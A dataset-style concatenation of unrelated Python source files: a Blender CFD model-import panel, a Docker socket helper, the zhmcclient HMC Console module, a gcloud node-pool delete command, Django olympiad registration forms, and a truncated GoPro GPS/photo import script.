# This file is part of reynolds-blender.
#
# reynolds-blender is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# reynolds-blender is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General
# Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with reynolds-blender. If not, see <http://www.gnu.org/licenses/>.
#------------------------------------------------------------------------------
# -----------
# bpy imports
# -----------
import bpy, bmesh
from bpy.props import (StringProperty,
BoolProperty,
IntProperty,
FloatProperty,
EnumProperty,
PointerProperty,
IntVectorProperty,
FloatVectorProperty,
CollectionProperty
)
from bpy.types import (Panel,
Operator,
PropertyGroup,
UIList
)
from bpy.path import abspath
from mathutils import Matrix, Vector
# --------------
# python imports
# --------------
import operator
import os
# ------------------------
# reynolds blender imports
# ------------------------
from reynolds_blender.gui.register import register_classes, unregister_classes
from reynolds_blender.gui.attrs import set_scene_attrs, del_scene_attrs
from reynolds_blender.gui.custom_operator import create_custom_operators
from reynolds_blender.gui.renderer import ReynoldsGUIRenderer
from reynolds_blender.sphere import SearchableSphereAddOperator
from reynolds_blender.add_block import BlockMeshAddOperator
# ----------------
# reynolds imports
# ----------------
from reynolds.dict.parser import ReynoldsFoamDict
from reynolds.foam.cmd_runner import FoamCmdRunner
# ------------------------------------------------------------------------
# operators
# ------------------------------------------------------------------------
def import_stl(self, context):
scene = context.scene
bpy.ops.import_mesh.stl(filepath=scene.stl_file_path,
axis_forward='Z',
axis_up='Y')
obj = scene.objects.active
print('active objects after import ', obj)
# -------------------------------------------------------------
# TBD : OBJ IS NONE, if multiple objects are added after import
# -------------------------------------------------------------
scene.geometries[obj.name] = {'file_path': scene.stl_file_path}
print('STL IMPORT: ', scene.geometries)
return {'FINISHED'}
def import_obj(self, context):
scene = context.scene
bpy.ops.import_scene.obj(filepath=scene.obj_file_path)
obj = scene.objects.active
print('active objects after import ', obj)
bpy.ops.object.transform_apply(location=False,
rotation=True,
scale=False)
# -------------------------------------------------------------
# TBD : OBJ IS NONE, if multiple objects are added after import
# -------------------------------------------------------------
scene.geometries[obj.name] = {'file_path': scene.obj_file_path}
print('OBJ IMPORT: ', scene.geometries)
return {'FINISHED'}
def add_geometry_block(self, context):
scene = context.scene
bpy.ops.object.origin_set(type='ORIGIN_GEOMETRY', center='BOUNDS')
obj = scene.objects.active
    # --------------------------
    # Start the console operator
    # --------------------------
bpy.ops.reynolds.of_console_op()
if obj is None:
self.report({'ERROR'}, 'Please select a geometry')
return {'FINISHED'}
bpy.ops.mesh.primitive_cube_add()
bound_box = bpy.context.active_object
dims = obj.dimensions
bound_box.dimensions = Vector((dims.x * 1.5, dims.y * 1.5, dims.z * 1.2))
bound_box.location = obj.location
bpy.ops.object.transform_apply(location=True,
rotation=True,
scale=True)
return {'FINISHED'}
class ModelsPanel(Panel):
bl_idname = "of_models_panel"
bl_label = "Import STL/OBJ Models"
bl_space_type = "VIEW_3D"
bl_region_type = "TOOLS"
bl_category = "Tools"
bl_context = "objectmode"
def draw(self, context):
layout = self.layout
scene = context.scene
row = layout.row()
row.operator(SearchableSphereAddOperator.bl_idname, text='Sphere',
icon='MESH_UVSPHERE')
row.operator(BlockMeshAddOperator.bl_idname, text='Box',
icon='META_CUBE')
# ----------------------------------------
# Render Models Panel using YAML GUI Spec
# ----------------------------------------
gui_renderer = ReynoldsGUIRenderer(scene, layout,
'models.yaml')
gui_renderer.render()
# ------------------------------------------------------------------------
# register and unregister
# ------------------------------------------------------------------------
def register():
register_classes(__name__)
set_scene_attrs('models.yaml')
create_custom_operators('models.yaml', __name__)
def unregister():
unregister_classes(__name__)
del_scene_attrs('models.yaml')
if __name__ == "__main__":
register()
| gpl-3.0 | -2,622,846,358,038,049,000 | 36.25731 | 79 | 0.501491 | false | 4.483462 | false | false | false |
rajdeepd/dockersamples | python/utils.py | 1 | 1545 | import httplib
import socket
import json
class UnixHTTPConnection(httplib.HTTPConnection):
"""
HTTPConnection object which connects to a unix socket.
"""
def __init__(self, sock_path):
httplib.HTTPConnection.__init__(self, "localhost")
self.sock_path = sock_path
def connect(self):
self.sock = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
self.sock.connect(self.sock_path)
class RequestHandler(object):
def __init__(self):
self.err_no = 0
def request(self, http_method, path, data):
self.err_no = 0
try:
conn = UnixHTTPConnection("/var/run/docker.sock")
conn.connect()
conn.request(http_method, path, body=json.dumps(data), headers={"Content-type": "application/json"})
response = conn.getresponse()
if response.status != 200:
self.err_no = response.status
return response.read()
except Exception as e:
self.err_no = -1
self.msg = str(e)
return str(e)
finally:
conn.close()
def has_error(self):
return (self.err_no != 0 and self.err_no != 200 and self.err_no != 204)
def printjson(jsonstr=None, obj=None):
if obj is None:
obj = json.loads(jsonstr)
print(json.dumps(obj, indent=2, sort_keys=True))
def paramstr_from_dict(params):
params_str = ""
for key in params.keys():
params_str += ("&" + key + "=" + str(params[key]))
return params_str
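# ---------------------------------------------------------------------------
# Illustrative usage sketch (not part of the original module): list containers
# through the local Docker socket. It assumes a running Docker daemon and
# permission to read /var/run/docker.sock.
# ---------------------------------------------------------------------------
if __name__ == "__main__":
    handler = RequestHandler()
    body = handler.request("GET", "/containers/json", {})
    if handler.has_error():
        print("request failed: " + body)
    else:
        printjson(jsonstr=body)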
| gpl-2.0 | 7,247,339,961,896,200,000 | 25.186441 | 112 | 0.583819 | false | 3.777506 | false | false | false |
zhmcclient/python-zhmcclient | zhmcclient/_console.py | 1 | 28583 | # Copyright 2017 IBM Corp. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
A :term:`Console` resource represents an HMC.
In a paired setup with primary and alternate HMC, each HMC is represented as
a separate :term:`Console` resource.
"""
from __future__ import absolute_import
import time
from ._manager import BaseManager
from ._resource import BaseResource
from ._logging import logged_api_call
from ._utils import timestamp_from_datetime, divide_filter_args, matches_filters
from ._storage_group import StorageGroupManager
from ._storage_group_template import StorageGroupTemplateManager
from ._user import UserManager
from ._user_role import UserRoleManager
from ._user_pattern import UserPatternManager
from ._password_rule import PasswordRuleManager
from ._task import TaskManager
from ._ldap_server_definition import LdapServerDefinitionManager
from ._unmanaged_cpc import UnmanagedCpcManager
__all__ = ['ConsoleManager', 'Console']
class ConsoleManager(BaseManager):
"""
Manager providing access to the :term:`Console` representing the HMC this
client is connected to.
In a paired setup with primary and alternate HMC, each HMC is represented
as a separate :term:`Console` resource.
Derived from :class:`~zhmcclient.BaseManager`; see there for common methods
and attributes.
Objects of this class are not directly created by the user; they are
accessible via the following instance variable of a
:class:`~zhmcclient.Client` object:
* :attr:`zhmcclient.Client.consoles`
"""
def __init__(self, client):
# This function should not go into the docs.
# Parameters:
# client (:class:`~zhmcclient.Client`):
# Client object for the HMC to be used.
super(ConsoleManager, self).__init__(
resource_class=Console,
class_name='console',
session=client.session,
parent=None,
base_uri='/api/console',
oid_prop='object-id',
uri_prop='object-uri',
name_prop='name',
query_props=None,
list_has_name=False)
self._client = client
self._console = None
@property
def client(self):
"""
:class:`~zhmcclient.Client`:
The client defining the scope for this manager.
"""
return self._client
@property
def console(self):
"""
:class:`~zhmcclient.Console`:
The :term:`Console` representing the HMC this client is connected to.
The returned object is cached, so it is looked up only upon first
access to this property.
The returned object has only the following properties set:
* 'class'
* 'parent'
* 'object-uri'
Use :meth:`~zhmcclient.BaseResource.get_property` or
:meth:`~zhmcclient.BaseResource.prop` to access any properties
regardless of whether they are already set or first need to be
retrieved.
"""
if self._console is None:
self._console = self.resource_object('/api/console')
return self._console
@logged_api_call
def list(self, full_properties=True, filter_args=None):
"""
List the (one) :term:`Console` representing the HMC this client is
connected to.
Authorization requirements:
* None
Parameters:
full_properties (bool):
Controls whether the full set of resource properties should be
retrieved, vs. only a short set consisting of 'object-uri'.
filter_args (dict):
This parameter exists for consistency with other list() methods
and will be ignored.
Returns:
: A list of :class:`~zhmcclient.Console` objects, containing the one
:term:`Console` representing the HMC this client is connected to.
Raises:
:exc:`~zhmcclient.HTTPError`
:exc:`~zhmcclient.ParseError`
:exc:`~zhmcclient.AuthError`
:exc:`~zhmcclient.ConnectionError`
"""
uri = self._base_uri # There is only one console object.
if full_properties:
props = self.session.get(uri)
else:
# Note: The Console resource's Object ID is not part of its URI.
props = {
self._uri_prop: uri,
}
resource_obj = self.resource_class(
manager=self,
uri=props[self._uri_prop],
name=props.get(self._name_prop, None),
properties=props)
return [resource_obj]
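# ---------------------------------------------------------------------------
# Illustrative usage sketch (an assumption for clarity, not part of the
# original module): how a client typically reaches the Console singleton.
# The host name and credentials are placeholders.
#
#     import zhmcclient
#     session = zhmcclient.Session('hmc.example.com', 'user', 'password')
#     client = zhmcclient.Client(session)
#     console = client.consoles.console
#     print(console.get_property('name'))
# ---------------------------------------------------------------------------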
class Console(BaseResource):
"""
Representation of a :term:`Console`.
Derived from :class:`~zhmcclient.BaseResource`; see there for common
methods and attributes.
Objects of this class are not directly created by the user; they are
returned from creation or list functions on their manager object
(in this case, :class:`~zhmcclient.ConsoleManager`).
"""
def __init__(self, manager, uri, name=None, properties=None):
# This function should not go into the docs.
# manager (:class:`~zhmcclient.ConsoleManager`):
# Manager object for this resource object.
# uri (string):
# Canonical URI path of the resource.
# name (string):
# Name of the resource.
# properties (dict):
# Properties to be set for this resource object. May be `None` or
# empty.
assert isinstance(manager, ConsoleManager), \
"Console init: Expected manager type %s, got %s" % \
(ConsoleManager, type(manager))
super(Console, self).__init__(manager, uri, name, properties)
# The manager objects for child resources (with lazy initialization):
self._storage_groups = None
self._storage_group_templates = None
self._users = None
self._user_roles = None
self._user_patterns = None
self._password_rules = None
self._tasks = None
self._ldap_server_definitions = None
self._unmanaged_cpcs = None
@property
def storage_groups(self):
"""
:class:`~zhmcclient.StorageGroupManager`:
Manager object for the Storage Groups in scope of this Console.
"""
# We do here some lazy loading.
if not self._storage_groups:
self._storage_groups = StorageGroupManager(self)
return self._storage_groups
@property
def storage_group_templates(self):
"""
:class:`~zhmcclient.StorageGroupTemplateManager`:
Manager object for the Storage Group Templates in scope of this
Console.
"""
# We do here some lazy loading.
if not self._storage_group_templates:
self._storage_group_templates = StorageGroupTemplateManager(self)
return self._storage_group_templates
@property
def users(self):
"""
:class:`~zhmcclient.UserManager`: Access to the :term:`Users <User>` in
this Console.
"""
# We do here some lazy loading.
if not self._users:
self._users = UserManager(self)
return self._users
@property
def user_roles(self):
"""
:class:`~zhmcclient.UserRoleManager`: Access to the
:term:`User Roles <User Role>` in this Console.
"""
# We do here some lazy loading.
if not self._user_roles:
self._user_roles = UserRoleManager(self)
return self._user_roles
@property
def user_patterns(self):
"""
:class:`~zhmcclient.UserPatternManager`: Access to the
:term:`User Patterns <User Pattern>` in this Console.
"""
# We do here some lazy loading.
if not self._user_patterns:
self._user_patterns = UserPatternManager(self)
return self._user_patterns
@property
def password_rules(self):
"""
:class:`~zhmcclient.PasswordRuleManager`: Access to the
:term:`Password Rules <Password Rule>` in this Console.
"""
# We do here some lazy loading.
if not self._password_rules:
self._password_rules = PasswordRuleManager(self)
return self._password_rules
@property
def tasks(self):
"""
:class:`~zhmcclient.TaskManager`: Access to the :term:`Tasks <Task>` in
this Console.
"""
# We do here some lazy loading.
if not self._tasks:
self._tasks = TaskManager(self)
return self._tasks
@property
def ldap_server_definitions(self):
"""
:class:`~zhmcclient.LdapServerDefinitionManager`: Access to the
:term:`LDAP Server Definitions <LDAP Server Definition>` in this
Console.
"""
# We do here some lazy loading.
if not self._ldap_server_definitions:
self._ldap_server_definitions = LdapServerDefinitionManager(self)
return self._ldap_server_definitions
@property
def unmanaged_cpcs(self):
"""
:class:`~zhmcclient.UnmanagedCpcManager`: Access to the unmanaged
:term:`CPCs <CPC>` in this Console.
"""
# We do here some lazy loading.
if not self._unmanaged_cpcs:
self._unmanaged_cpcs = UnmanagedCpcManager(self)
return self._unmanaged_cpcs
@logged_api_call
def restart(self, force=False, wait_for_available=True,
operation_timeout=None):
"""
Restart the HMC represented by this Console object.
Once the HMC is online again, this Console object, as well as any other
resource objects accessed through this HMC, can continue to be used.
An automatic re-logon will be performed under the covers, because the
HMC restart invalidates the currently used HMC session.
Authorization requirements:
* Task permission for the "Shutdown/Restart" task.
* "Remote Restart" must be enabled on the HMC.
Parameters:
force (bool):
Boolean controlling whether the restart operation is processed when
users are connected (`True`) or not (`False`). Users in this sense
are local or remote GUI users. HMC WS API clients do not count as
users for this purpose.
wait_for_available (bool):
Boolean controlling whether this method should wait for the HMC to
become available again after the restart, as follows:
* If `True`, this method will wait until the HMC has restarted and
is available again. The
:meth:`~zhmcclient.Client.query_api_version` method will be used
to check for availability of the HMC.
* If `False`, this method will return immediately once the HMC
has accepted the request to be restarted.
operation_timeout (:term:`number`):
Timeout in seconds, for waiting for HMC availability after the
restart. The special value 0 means that no timeout is set. `None`
means that the default async operation timeout of the session is
used. If the timeout expires when `wait_for_available=True`, a
:exc:`~zhmcclient.OperationTimeout` is raised.
Raises:
:exc:`~zhmcclient.HTTPError`
:exc:`~zhmcclient.ParseError`
:exc:`~zhmcclient.AuthError`
:exc:`~zhmcclient.ConnectionError`
:exc:`~zhmcclient.OperationTimeout`: The timeout expired while
waiting for the HMC to become available again after the restart.
"""
body = {'force': force}
self.manager.session.post(self.uri + '/operations/restart', body=body)
if wait_for_available:
time.sleep(10)
self.manager.client.wait_for_available(
operation_timeout=operation_timeout)
@logged_api_call
def shutdown(self, force=False):
"""
Shut down and power off the HMC represented by this Console object.
While the HMC is powered off, any Python resource objects retrieved
from this HMC may raise exceptions upon further use.
In order to continue using Python resource objects retrieved from this
HMC, the HMC needs to be started again (e.g. by powering it on
locally). Once the HMC is available again, Python resource objects
retrieved from that HMC can continue to be used.
An automatic re-logon will be performed under the covers, because the
HMC startup invalidates the currently used HMC session.
Authorization requirements:
* Task permission for the "Shutdown/Restart" task.
* "Remote Shutdown" must be enabled on the HMC.
Parameters:
force (bool):
Boolean controlling whether the shutdown operation is processed
when users are connected (`True`) or not (`False`). Users in this
sense are local or remote GUI users. HMC WS API clients do not
count as users for this purpose.
Raises:
:exc:`~zhmcclient.HTTPError`
:exc:`~zhmcclient.ParseError`
:exc:`~zhmcclient.AuthError`
:exc:`~zhmcclient.ConnectionError`
"""
body = {'force': force}
self.manager.session.post(self.uri + '/operations/shutdown', body=body)
@logged_api_call
def make_primary(self):
"""
Change the role of the alternate HMC represented by this Console object
to become the primary HMC.
If that HMC is already the primary HMC, this method does not change its
        role and succeeds.
The HMC represented by this Console object must participate in a
{primary, alternate} pairing.
Authorization requirements:
* Task permission for the "Manage Alternate HMC" task.
Raises:
:exc:`~zhmcclient.HTTPError`
:exc:`~zhmcclient.ParseError`
:exc:`~zhmcclient.AuthError`
:exc:`~zhmcclient.ConnectionError`
"""
self.manager.session.post(self.uri + '/operations/make-primary')
@staticmethod
def _time_query_parms(begin_time, end_time):
"""Return the URI query paramterer string for the specified begin time
and end time."""
query_parms = []
if begin_time is not None:
begin_ts = timestamp_from_datetime(begin_time)
qp = 'begin-time={}'.format(begin_ts)
query_parms.append(qp)
if end_time is not None:
end_ts = timestamp_from_datetime(end_time)
qp = 'end-time={}'.format(end_ts)
query_parms.append(qp)
query_parms_str = '&'.join(query_parms)
if query_parms_str:
query_parms_str = '?' + query_parms_str
return query_parms_str
@logged_api_call
def get_audit_log(self, begin_time=None, end_time=None):
"""
Return the console audit log entries, optionally filtered by their
creation time.
Authorization requirements:
* Task permission to the "Audit and Log Management" task.
Parameters:
begin_time (:class:`~py:datetime.datetime`):
Begin time for filtering. Log entries with a creation time older
than the begin time will be omitted from the results.
If `None`, no such filtering is performed (and the oldest available
log entries will be included).
end_time (:class:`~py:datetime.datetime`):
End time for filtering. Log entries with a creation time newer
than the end time will be omitted from the results.
If `None`, no such filtering is performed (and the newest available
log entries will be included).
Returns:
:term:`json object`:
A JSON object with the log entries, as described in section
'Response body contents' of operation 'Get Console Audit Log' in
the :term:`HMC API` book.
Raises:
:exc:`~zhmcclient.HTTPError`
:exc:`~zhmcclient.ParseError`
:exc:`~zhmcclient.AuthError`
:exc:`~zhmcclient.ConnectionError`
"""
query_parms = self._time_query_parms(begin_time, end_time)
uri = self.uri + '/operations/get-audit-log' + query_parms
result = self.manager.session.get(uri)
return result
@logged_api_call
def get_security_log(self, begin_time=None, end_time=None):
"""
Return the console security log entries, optionally filtered by their
creation time.
Authorization requirements:
* Task permission to the "View Security Logs" task.
Parameters:
begin_time (:class:`~py:datetime.datetime`):
Begin time for filtering. Log entries with a creation time older
than the begin time will be omitted from the results.
If `None`, no such filtering is performed (and the oldest available
log entries will be included).
end_time (:class:`~py:datetime.datetime`):
End time for filtering. Log entries with a creation time newer
than the end time will be omitted from the results.
If `None`, no such filtering is performed (and the newest available
log entries will be included).
Returns:
:term:`json object`:
A JSON object with the log entries, as described in section
'Response body contents' of operation 'Get Console Security Log' in
the :term:`HMC API` book.
Raises:
:exc:`~zhmcclient.HTTPError`
:exc:`~zhmcclient.ParseError`
:exc:`~zhmcclient.AuthError`
:exc:`~zhmcclient.ConnectionError`
"""
query_parms = self._time_query_parms(begin_time, end_time)
uri = self.uri + '/operations/get-security-log' + query_parms
result = self.manager.session.get(uri)
return result
@logged_api_call
def list_unmanaged_cpcs(self, name=None):
"""
List the unmanaged CPCs of this HMC.
For details, see :meth:`~zhmcclient.UnmanagedCpc.list`.
Authorization requirements:
* None
Parameters:
name (:term:`string`):
Regular expression pattern for the CPC name, as a filter that
narrows the list of returned CPCs to those whose name property
matches the specified pattern.
`None` causes no filtering to happen, i.e. all unmanaged CPCs
discovered by the HMC are returned.
Returns:
: A list of :class:`~zhmcclient.UnmanagedCpc` objects.
Raises:
:exc:`~zhmcclient.HTTPError`
:exc:`~zhmcclient.ParseError`
:exc:`~zhmcclient.AuthError`
:exc:`~zhmcclient.ConnectionError`
"""
filter_args = dict()
if name is not None:
filter_args['name'] = name
cpcs = self.unmanaged_cpcs.list(filter_args=filter_args)
return cpcs
@logged_api_call
def list_permitted_partitions(
self, full_properties=False, filter_args=None):
"""
List the permitted partitions of CPCs in DPM mode managed by this HMC.
*Added in version 1.0; requires HMC 2.14.0 or later*
Any CPCs in classic mode managed by the HMC will be ignored for this
operation.
The partitions in the result can be additionally limited by specifying
filter arguments.
Authorization requirements:
* Object permission to the partition objects included in the result.
Parameters:
full_properties (bool):
Controls whether the full set of resource properties for the
returned Partition objects should be retrieved, vs. only a short
set.
filter_args (dict):
Filter arguments for limiting the partitions in the result.
`None` causes no filtering to happen.
The following filter arguments are supported by server-side
filtering:
* name (string): Limits the result to partitions whose name
            matches the specified regular expression.
* type (string): Limits the result to partitions with a matching
"type" property value (i.e. "linux", "ssc", "zvm").
* status (string): Limits the result to partitions with a matching
"status" property value.
* has-unacceptable-status (bool): Limits the result to partitions
with a matching "has-unacceptable-status" property value.
* cpc-name (string): Limits the result to partitions whose CPC
has a name that matches the specified regular expression.
Any other valid property of partitions is supported by
client-side filtering:
* <property-name>: Any other property of partitions.
Returns:
: A list of :class:`~zhmcclient.Partition` objects.
Raises:
:exc:`~zhmcclient.HTTPError`
:exc:`~zhmcclient.ParseError`
:exc:`~zhmcclient.AuthError`
:exc:`~zhmcclient.ConnectionError`
"""
query_parms, client_filters = divide_filter_args(
['name', 'type', 'status', 'has-unacceptable-status', 'cpc-name'],
filter_args)
# Perform the operation with the HMC, including any server-side
# filtering.
uri = self.uri + '/operations/list-permitted-partitions' + query_parms
result = self.manager.session.get(uri)
partition_objs = []
if result:
partition_items = result['partitions']
for partition_item in partition_items:
# The partition items have the following partition properties:
# * name, object-uri, type, status, has-unacceptable-status
# And the following properties for their parent CPC:
# * cpc-name (CPC property 'name')
# * cpc-object-uri (CPC property 'object-uri')
# * se-version (CPC property 'se-version')
# Create a 'skeleton' local Cpc object we can hang the
# Partition objects off of, even if the user does not have
# access permissions to these CPCs. Note that different
# partitions can have different parent CPCs.
cpc = self.manager.client.cpcs.find_local(
partition_item['cpc-name'],
partition_item['cpc-object-uri'],
{
'se-version': partition_item['se-version'],
},
)
partition_obj = cpc.partitions.resource_object(
partition_item['object-uri'],
{
'name': partition_item['name'],
'type': partition_item['type'],
'status': partition_item['status'],
'has-unacceptable-status':
partition_item['has-unacceptable-status'],
},
)
# Apply client-side filtering
if matches_filters(partition_obj, client_filters):
partition_objs.append(partition_obj)
if full_properties:
partition_obj.pull_full_properties()
return partition_objs
@logged_api_call
def list_permitted_lpars(
self, full_properties=False, filter_args=None):
"""
List the permitted LPARs of CPCs in classic mode managed by this HMC.
*Added in version 1.0; requires HMC 2.14.0 or later*
Any CPCs in DPM mode managed by the HMC will be ignored for this
operation.
The LPARs in the result can be additionally limited by specifying
filter arguments.
Authorization requirements:
* Object permission to the LPAR objects included in the result.
Parameters:
full_properties (bool):
Controls whether the full set of resource properties for the
returned LPAR objects should be retrieved, vs. only a short set.
filter_args (dict):
Filter arguments for limiting the LPARs in the result.
`None` causes no filtering to happen.
The following filter arguments are supported by server-side
filtering:
* name (string): Limits the result to LPARs whose name
            matches the specified regular expression.
* activation-mode (string): Limits the result to LPARs with a
matching "activation-mode" property value.
* status (string): Limits the result to LPARs with a matching
"status" property value.
* has-unacceptable-status (bool): Limits the result to LPARs
with a matching "has-unacceptable-status" property value.
* cpc-name (string): Limits the result to LPARs whose CPC
has a name that matches the specified regular expression.
Any other valid property of LPARs is supported by
client-side filtering:
* <property-name>: Any other property of LPARs.
Returns:
: A list of :class:`~zhmcclient.Lpar` objects.
Raises:
:exc:`~zhmcclient.HTTPError`
:exc:`~zhmcclient.ParseError`
:exc:`~zhmcclient.AuthError`
:exc:`~zhmcclient.ConnectionError`
"""
query_parms, client_filters = divide_filter_args(
            ['name', 'activation-mode', 'status', 'has-unacceptable-status',
             'cpc-name'],
filter_args)
# Perform the operation with the HMC, including any server-side
# filtering.
uri = self.uri + '/operations/list-permitted-logical-partitions' + \
query_parms
result = self.manager.session.get(uri)
lpar_objs = []
if result:
lpar_items = result['logical-partitions']
for lpar_item in lpar_items:
                # The LPAR items have the following LPAR properties:
# * name, object-uri, activation-mode, status,
# has-unacceptable-status
# And the following properties for their parent CPC:
# * cpc-name (CPC property 'name')
# * cpc-object-uri (CPC property 'object-uri')
# * se-version (CPC property 'se-version')
# Create a 'skeleton' local Cpc object we can hang the
                # Lpar objects off of, even if the user does not have
                # access permissions to these CPCs. Note that different
                # LPARs can have different parent CPCs.
cpc = self.manager.client.cpcs.find_local(
lpar_item['cpc-name'],
lpar_item['cpc-object-uri'],
{
'se-version': lpar_item['se-version'],
},
)
lpar_obj = cpc.lpars.resource_object(
lpar_item['object-uri'],
{
'name': lpar_item['name'],
'activation-mode': lpar_item['activation-mode'],
'status': lpar_item['status'],
'has-unacceptable-status':
lpar_item['has-unacceptable-status'],
},
)
# Apply client-side filtering
if matches_filters(lpar_obj, client_filters):
lpar_objs.append(lpar_obj)
if full_properties:
lpar_obj.pull_full_properties()
return lpar_objs
| apache-2.0 | 1,441,471,050,216,845,600 | 34.773467 | 80 | 0.599587 | false | 4.566704 | false | false | false |
flgiordano/netcash | +/google-cloud-sdk/lib/surface/container/nodepools/delete.py | 1 | 2953 | # Copyright 2014 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Delete node pool command."""
import argparse
from googlecloudsdk.calliope import actions
from googlecloudsdk.calliope import base
from googlecloudsdk.core import log
from googlecloudsdk.core import properties
from googlecloudsdk.core.console import console_io
@base.ReleaseTracks(base.ReleaseTrack.ALPHA)
class Delete(base.Command):
"""Delete an existing node pool in a running cluster."""
@staticmethod
def Args(parser):
"""Register flags for this command.
Args:
parser: An argparse.ArgumentParser-like object. It is mocked out in order
to capture some information, but behaves like an ArgumentParser.
"""
parser.add_argument(
'name',
metavar='NAME',
help='The name of the node pool to delete.')
parser.add_argument(
'--timeout',
type=int,
default=1800,
help=argparse.SUPPRESS)
parser.add_argument(
'--wait',
action='store_true',
default=True,
help='Poll the operation for completion after issuing a delete '
'request.')
parser.add_argument(
'--cluster',
help='The cluster from which to delete the node pool.',
action=actions.StoreProperty(properties.VALUES.container.cluster))
def Run(self, args):
"""This is what gets called when the user runs this command.
Args:
args: an argparse namespace. All the arguments that were provided to this
command invocation.
Returns:
      The operation reference for the node pool deletion.
"""
adapter = self.context['api_adapter']
pool_ref = adapter.ParseNodePool(args.name)
console_io.PromptContinue(
message=('The following node pool will be deleted.\n'
'[{name}] in cluster [{clusterId}] in zone [{zone}]')
.format(name=pool_ref.nodePoolId,
clusterId=pool_ref.clusterId,
zone=adapter.Zone(pool_ref)),
throw_if_unattended=True,
cancel_on_no=True)
# Make sure it exists (will raise appropriate error if not)
adapter.GetNodePool(pool_ref)
op_ref = adapter.DeleteNodePool(pool_ref)
if args.wait:
adapter.WaitForOperation(
op_ref,
'Deleting node pool {0}'.format(pool_ref.clusterId),
timeout_s=args.timeout)
log.DeletedResource(pool_ref)
return op_ref
| bsd-3-clause | -578,831,552,267,577,600 | 31.450549 | 79 | 0.675246 | false | 4.165021 | false | false | false |
gurovic/oluch2 | oluch/forms.py | 1 | 3254 | from django.utils.translation import ugettext_lazy as _
from django import forms
from django.contrib.auth.models import User
from oluch.models import Submit
class SubmitForm(forms.Form):
file = forms.FileField(label=_("Choose a file"))
user = forms.HiddenInput()
def __init__(self, choices, *args, **kwargs):
super(SubmitForm, self).__init__(*args, **kwargs)
self.fields['problem'] = forms.ChoiceField(choices, label=_("Problem"))
class UserInfoForm(forms.Form):
username = forms.SlugField(max_length=20, label=_("Login"), widget=forms.TextInput(attrs={'size':'40'}))
password1 = forms.SlugField(max_length=20, widget=forms.PasswordInput(attrs={'size':'40'}), label=_("Password"))
password2 = forms.SlugField(max_length=20, widget=forms.PasswordInput(attrs={'size':'40'}), label=_("Password again"))
lastname = forms.CharField(max_length=100, required=False, label=_("Last name"), widget=forms.TextInput(attrs={'size':'40'}))
firstname = forms.CharField(max_length=100, required=False, label=_("Given name"), widget=forms.TextInput(attrs={'size':'40'}))
grade = forms.CharField(max_length=1000, required=True, label=_("Grade"), widget=forms.TextInput(attrs={'size':'40'}))
school = forms.CharField(max_length=1000, required=True, label=_("School"), widget=forms.TextInput(attrs={'size':'40'}))
maxgrade = forms.CharField(max_length=1000, required=True, label=_("The last grade at your high school"), widget=forms.TextInput(attrs={'size':'40'}))
city = forms.CharField(max_length=1000, required=True, label=_("City/settlement"), widget=forms.TextInput(attrs={'size':'40'}))
country = forms.CharField(max_length=1000, required=True, label=_("Country"), widget=forms.TextInput(attrs={'size':'40'}))
def clean(self):
'''Required custom validation for the form.'''
super(forms.Form, self).clean()
if 'password1' in self.cleaned_data and 'password2' in self.cleaned_data:
if self.cleaned_data['password1'] != self.cleaned_data['password2']:
self._errors['password'] = [_('Passwords must match.')]
self._errors['password_confirm'] = [_('Passwords must match.')]
try:
if set(self.cleaned_data["username"]) - set('ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789'):
self._errors['username'] = [_('Bad login.')]
elif User.objects.filter(username=self.cleaned_data["username"]).count() > 0:
self._errors['username'] = [_('User with such username already exists.')]
except:
self._errors['username'] = [_('Bad login.')]
try:
int(self.cleaned_data['grade'])
except:
self._errors['grade'] = [_('Grade must be a number.')]
try:
int(self.cleaned_data['maxgrade'])
except:
self._errors['maxgrade'] = [_('Grade must be a number.')]
        if self.cleaned_data.get('lastname'):
            self.cleaned_data['lastname'] = self.cleaned_data['lastname'][0].upper() + self.cleaned_data['lastname'][1:]
        if self.cleaned_data.get('firstname'):
            self.cleaned_data['firstname'] = self.cleaned_data['firstname'][0].upper() + self.cleaned_data['firstname'][1:]
        return self.cleaned_data
| gpl-2.0 | -6,291,880,909,630,117,000 | 54.413793 | 154 | 0.63614 | false | 3.992638 | false | false | false
DenisCarriere/gopro | examples/open_csv.py | 1 | 1419 | import os
import csv
import time
from datetime import datetime
from datetime import timedelta
from dateutil import parser
import exifread
from pymongo import MongoClient
client = MongoClient()
root = '/home/ubuntu/Pictures/GoPro/'
client.gopro.gpx.remove({})
client.gopro.photos.remove({})
with open(root + 'Gopro2.csv') as f:
first_line = f.readline().strip()
if first_line == '"Name","Activity type","Description"':
# Skip 2nd & 3rd line also
f.readline()
f.readline()
else:
pass
# Read CSV
reader = csv.DictReader(f)
for line in reader:
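        # Note: the fixed 5-hour shift below presumably converts the GPS log's
        # timestamps to the camera's local time so they line up with the photos.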
delta = timedelta(0, 60*60*5)
dt = parser.parse(line['Time']) - delta
store = {
'lat': line['Latitude (deg)'],
'lng': line['Longitude (deg)'],
'dt': dt,
'bearing': line['Bearing (deg)'],
'altitude': line['Altitude (m)'],
'accuracy': line['Accuracy (m)']
}
client.gopro.gpx.save(store)
# Read Photos
for filename in os.listdir(root):
if '.JPG' in filename:
path = root + filename
with open(path) as f:
tags = exifread.process_file(f)
dt = parser.parse(str(tags['EXIF DateTimeOriginal']))
store = {
'dt': dt,
'filename': filename,
'path': path,
